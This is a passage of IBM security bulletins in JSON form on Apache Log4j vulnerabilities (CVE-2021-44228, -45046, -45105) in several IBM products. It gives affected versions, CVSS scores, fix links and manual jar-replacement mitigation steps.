\nIBM Cognos Analytics 11.1.x\n\n| [IBM Cognos Analytics 11.1.7 Interim Fix 9](<https://www.ibm.com/support/pages/node/6525664> \"\" ) | [IBM Cognos Analytics 11.1.7 Interim Fix 9 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.1.7-BA-CA-BNDL-IF009:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc>) \n \nIBM Cognos Analytics 11.0.6 to 11.0.13 FP4\n\n| \n\n[IBM Cognos Analytics 11.0.13 Interim Fix 5](<https://www.ibm.com/support/pages/node/6525666>)\n\n| \n\n[IBM Cognos Analytics 11.0.13 Interim Fix 5 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.0.13-BA-CA-BNDL-IF005:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"\" ) \n \nCVE-2021-44228 has been remediated on all IBM Cognos Analytics on Cloud environments.\n\n## Workarounds and Mitigations\n\nThe IBM Cognos Analytics team have developed a \u201cno-upgrade\u201d option for our \u201cOn Prem\u201d (local installation) customers.\n\nThe single version of the patch is applicable to IBM Cognos Analytics versions 11.0.6 to 11.0.13 FP4, 11.1.x and 11.2.x. \n\nThe log4jSafeAgent file that is provided for Cognos Analytics modifies the class byte code at the Java startup time. It removes the vulnerable JNDI lookup, and enforces the StrSubstitutor recursion limit without altering the installed product.\n\nIt effectively rewrites the \u201corg/apache/logging/log4j/core/lookup/JndiLookup\u201d class to remove its content during IBM Cognos Analytics start up.\n\nTo get the patch and detailed instructions, click this link: [log4jSafeAgent](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=Cognos&product=ibm/Information+Management/Cognos+Analytics&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-MP-log4jFix&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"<log4jSafeAgent2021>\" ) \n \nBundle Customers can use the following link: [log4jSafeAgent Bundled](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-BNDL-log4jFix:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"<log4jSafeAgent2021 Bundled>\" )\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-20T19:30:06", "type": "ibm", "title": "Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerability (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45105"], "modified": "2022-04-20T19:30:06", "id": "40793F706E8E7D40E73D53F66523BA8AE8718C40C00FCEF117CE8DEAC4566FD6", "href": "https://www.ibm.com/support/pages/node/6526474", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:45", "description": "## Summary\n\nVulnerabilities in Apache Log4j could result in a denial of service or remote code execution. These vulnerabilities may affect the Help system in IBM Spectrum Protect Operations Center. The below fix packages include Apache Log4j 2.17\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Spectrum Protect Operations Center| 8.1.0.000-8.1.13.100 \n7.1.0.000-7.1.14.100 \n \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing this vulnerability now by upgrading to the fixed level instead of using the manual process described under Workarounds and Mitigations section.**\n\n**Note: The below fix packages include Log4j 2.17.**\n\n**_IBM Spectrum Protect Operations Center Affected Versions \n_**| **_Fixing \nLevel_**| **_Platform_**| **_Link to Fix and Instructions \n_** \n---|---|---|--- \n \n8.1.0.000-8.1.13.100| \n8.1.13.200| AIX \nLinux \nWindows| \n<https://www.ibm.com/support/pages/node/6527288> \n \n7.1.0.000-7.1.14.100\n\n| 7.1.14.200| AIX \nLinux \nWindows| <https://www.ibm.com/support/pages/node/6527284> \n \n## Workarounds and Mitigations\n\n**Manual Procedure to Update the Help system**\n\nThe Help system shipped along with the Operations Center includes the affected log4j versions. To manually update the Help system: \n\n\n1\\. Download the following from Apache:\n\nApache Log4j 2 binary(zip) apache-log4j-2.17.0-bin.zip\n\n<https://logging.apache.org/log4j/2.0/download.html>\n\n2\\. Stop the Operations Center service (which also stops the Help system)\n\nAIX - /opt/tivoli/tsm/ui/utils/stopserver.sh\n\nLinux -\n\n8.1.9 and Lower (including v7) - service opscenter.rc stop\n\n8.1.10 and higher - systemctl stop opscenter.service\n\nWindows - From the Services window, stop the IBM Spectrum\u00ae Protect Operations Center service.\n\n3\\. Unzip the apache-log4j-2.17.0-bin.zip\n\n4\\. From the unzipped directory apache-log4j-2.17.0-bin copy the log4j2.17 jars and remove the earlier ones\n\n5\\. From\n\nAIX and Linux - /opt/tivoli/tsm/ui/Liberty/usr/servers/guiServer/apps/TSM_HELP.war/WEB-INF/lib/\n\nWindows - c:\\Program Files\\Tivoli\\TSM\\\\\\ui\\Liberty\\usr\\servers\\guiServer\\apps/TSM_HELP.war/WEB-INF/lib\\\n\nReplace:\n\nlog4j-api-2.8.2.jar\n\nlog4j-1.2-api-2.8.2.jar\n\nlog4j-core-2.8.2.jar\n\nlog4j-slf4j-impl-2.8.2.jar\n\nwith\n\nlog4j-api-2.17.0.jar\n\nlog4j-1.2-api-2.17.0.jar\n\nlog4j-core-2.17.0.jar\n\nlog4j-slf4j-impl-2.17.0.jar\n\n6\\. Restart OC service\n\nAIX - /opt/tivoli/tsm/ui/utils/startserver.sh\n\nLinux -\n\n8.1.9 and Lower (including v7) - service opscenter.rc start\n\n8.1.10 and higher - systemctl start opscenter.service\n\nWindows - From the Services window, start the IBM Spectrum\u00ae Protect Operations Center service.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T17:59:18", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Log4j affect IBM Spectrum Protect Operations Center (CVE-2021-45105, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-27T17:59:18", "id": "342C70DE6943237DCB4E2BCA66A117A8AC4A929DA3631A2BB88E27D99C1A1F68", "href": "https://www.ibm.com/support/pages/node/6537240", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:48", "description": "## Summary\n\nThere is a vulnerability in the Apache Log4j open source library. The library is used by IBM Event Streams.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Event Streams| 2019.4.1, 2019.4.2, 2019.4.3, 2019.4.4, 2019.4.5 \nIBM Event Streams| 10.0.0, 10.1.0, 10.2.0, 10.3.0, 10.3.1, 10.4.0 \n \n## Remediation/Fixes\n\n#### IBM Event Streams (Helm-based releases)\n\n * Download the 2019.4.6 release from [IBM Fix Central](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/IBM+Event+Streams&release=2019.4.1&platform=All&function=fixId&fixids=*IBM-Event-Streams*> \"IBM Fix Central\" ).\n * Upgrade to IBM Event Streams 2019.4.6 by following the [upgrading and migrating](<https://ibm.github.io/event-streams/2019.4/installing/upgrading/> \"upgrading and migrating\" ) documentation.\n\n**IBM Event Streams (Continuous Delivery)**\n\n * Upgrade to IBM Event Streams 10.5.0 by following the [upgrading and migrating](<https://ibm.github.io/event-streams/installing/upgrading/> \"\" ) documentation.\n\n**IBM Event Streams (Extended Update Support)**\n\n * Upgrade to IBM Event Streams 10.2.1 by following the [upgrading and migrating](<https://ibm.github.io/event-streams/10.2/installing/upgrading/> \"\" ) documentation.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-24T15:57:25", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects IBM Event Streams (CVE-2021-45105, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-24T15:57:25", "id": "3E89F6F868ACED4017A55BB54A40658D10E6704003F50ACBCE289C1637B41045", "href": "https://www.ibm.com/support/pages/node/6536920", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:32", "description": "## Summary\n\nThere are multiple Apache Log4j (CVE-2021-45105, CVE-2021-45046) vulnerabilities impacting IBM Watson Studio Premium Add On in Cloud Pak for Data which uses Apache Log4j for logging. The fix includes Apache Log4j 2.17.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \n \nIBM Watson Studio Premium Add On in Cloud Pak for Data\n\n| 4.0.4 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now **\n\n**Affected Product(s)**\n\n| **Version(s)**| **Fixes** \n---|---|--- \nIBM Watson Studio Premium Add On in Cloud Pak for Data| 4.0.4| \n\nGet the latest refresh by upgrading to [4.0.5](<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=planning-operator-operand-versions#versions__cpd-platform> \"4.0.5\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-27T02:01:54", "type": "ibm", "title": "Security Bulletin: IBM Watson Studio Premium Add On in Cloud Pak for Data is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-27T02:01:54", "id": "5FAA10ECBDD6BDD67568DC782206BEA34BD7120E44FD8D30001A968A438E5C77", "href": "https://www.ibm.com/support/pages/node/6551312", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:37", "description": "## Summary\n\nIBM Sterling Secure Proxy is vulnerable to denial of service and arbitrary code execution due to Apache Log4j, which is used for logging (CVE-2021-45105,CVE-2021-45046). The fix includes Apache Log4j 2.17.0.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Sterling Secure Proxy| 3.4.3.2 \nIBM Sterling Secure Proxy| 6.0.2 \nIBM Sterling Secure Proxy| 6.0.3 \n \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\nSee the Fix Central links below for Apache Log4j 2.17.0 jar files and installation instructions for an immediate remediation of the vulnerabilities prior to full iFixes for the associated releases. \n\n**Product**| **VRMF**| **Remediation** \n---|---|--- \nIBM Sterling Secure Proxy| 6.0.3| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \nIBM Sterling Secure Proxy| 6.0.2| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \nIBM Sterling Secure Proxy| 3.4.3.2| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \n \nThe [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) link points to a fix called SSP-SEAS-log4j-2.17.0-jars-for-CVE-2021-45105 which supplies the jars and instructions to replace them. This fix remediates CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-04T16:02:00", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Log4j impact IBM Sterling Secure Proxy (CVE-2021-45105, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-04T16:02:00", "id": "1C6CC8129E7AEC5C314CCFD7570FC09548438820946E9774FD2E2410C0897958", "href": "https://www.ibm.com/support/pages/node/6538100", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:56:48", "description": "## Summary\n\nApache Log4j has vulnerabilities that affect IBM Sterling B2B Integrator. Final remediation images published below. As an alternative to the final remediation images, manual mitigation steps are also provided below.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling B2B Integrator| 6.0.0.0 - 6.1.1.0 \n \nNote that remote perimeter server, CLA2, OpsServer and external purge has been assessed for impact and were found to be not affected.\n\nDue to concern surrounding Apache Log4j CVE-2021-45046 and CVE-2021-45105, end-of-support stream IBM Sterling B2B Integrator Version 5.2.x has been assessed for impact the versions and fix packs below were found to be not affected by CVE-2021-45046 and CVE-2021-45105: \n5020605_3 and all lower fix packs \n5020604 and all fix packs \n5020603 and all fix packs \n5020602 and all fix packs \n5020601 and all fix packs \n5020600 and all fix packs \n5020500 and all fix packs \n5020402 and all fix packs\n\n## Remediation/Fixes\n\nProduct &amp; Version| Remediation &amp; Fix \n---|--- \nIBM Sterling B2B Integrator 6.0.0.0 - 6.1.1.0| \n\n**_IIM_**\n\nStep 1: Apply IBM Sterling B2B Integrator IIM version 6.0.0.7, 6.0.3.5, 6.1.0.4, 6.1.1.0, 6.0.2.3 or 6.0.1.2 \n\nStep 2: Apply the remediating ifix 6.0.0.7_1, 6.0.3.5_1, 6.1.0.4_1 , 6.1.1.0_1, 6.0.2.3._1 or 6.0.1.2_1 that are located on [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>).\n\nAlso for 6.1.1.0 after applying the remediating ifix 6.1.1.0_1, additionally follow the steps in this [technote.](<https://www.ibm.com/support/pages/node/6551444> \"technote\" )\n\n**_Docker &amp; Containers_**\n\nStep 1: Apply either IBM Sterling B2B Integrator Docker version 6.0.0.7, 6.0.3.5 or 6.1.0.4, \n\nStep 2: Next apply one of the remediating ifixes below:\n\nIBM Sterling B2B Integrator Docker version 6.0.0.7_1 on [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>)\n\nIBM Sterling B2B Integrator Docker version 6.0.3.5_1 on [Fix Central](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+B2B+Integrator&fixids=6.0.3.5-OtherSoftware-B2Bi-Docker-All-IF0001&source=SAR>)\n\nIBM Sterling B2B Integrator Container version 6.1.0.4_1\n\n * [Certified Container Image](<cp.icr.io/cp/ibm-b2bi/b2bi:6.1.0.4_1> \"Certified Container Image\" )\n * [Helm Chart](<https://github.com/IBM/charts/blob/master/repo/ibm-helm/ibm-b2bi-prod-2.0.5.tgz> \"Helm Chart\" ) \n \n## Workarounds and Mitigations\n\n**If you are unable to apply the remediated fix packs above, as an alternative IBM strongly recommends addressing the vulnerability by applying one of these mandatory remediation steps below now. **\n\n**Before applying any of the Workarounds and Mitigations below ensure that the file system of IBM Sterling B2B Integrator has been fully backed up.**\n\n**Linux: ** The following script can be applied to **Linux** B2Bi ASI node and Adapter Container nodes. Please ensure to read the included readme file before applying.\n\n[`http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+B2B+Integrator&fixids=B2Bi-rhel-log4j-remediation&source=SAR`](<https://urldefense.com/v3/__http:/www.ibm.com/support/fixcentral/quickorder?product=ibm*2FOther*software*2FSterling*B2B*Integrator&fixids=B2Bi-rhel-log4j-remediation&source=SAR__;JSslKys!!I6-MEfEZPA!eWYwlqriN-0XFGfQDbcUIDbKwx1QTpU_oCC9q9d8EMVMPkNXi37hTGqsbPYUGfFTnVdp0Q$>) \n\n\n**AIX**: The following script can be applied to **AIX** B2Bi ASI node and Adapter Container nodes. Please ensure to read the included readme file before applying.\n\n[`http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+B2B+Integrator&fixids=B2Bi-aix-log4j-remediation&source=SAR`](<https://urldefense.com/v3/__http:/www.ibm.com/support/fixcentral/quickorder?product=ibm*2FOther*software*2FSterling*B2B*Integrator&fixids=B2Bi-aix-log4j-remediation&source=SAR__;JSslKys!!I6-MEfEZPA!bcZjVMMicPAaQ9c71mSnBWEX8b1NEyFcdfntlAaHB1rftTMSVAtbUysoDT_d0sn0Mimx1Q$>)\n\n**Docker Container or OCP**: The following document with steps can be manually applied to **Docker Container or OCP** B2Bi ASI node and Adapter Container nodes: \n\n[`http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+B2B+Integrator&fixids=B2Bi-Docker-and-OCP-log4j-remediation&source=SAR`](<https://urldefense.com/v3/__http:/www.ibm.com/support/fixcentral/quickorder?product=ibm*2FOther*software*2FSterling*B2B*Integrator&fixids=B2Bi-Docker-and-OCP-log4j-remediation&source=SAR__;JSslKys!!I6-MEfEZPA!c94_YkFcF1M9ywRiF_61mK9mSfXF5FFY-lRHlEo2qVqdmb-ywEmpfj5hPhLkFuccMx7w8Q$>) \n \n\n\n**Windows: **The following document with steps can be manually applied to **Windows** B2Bi ASI node 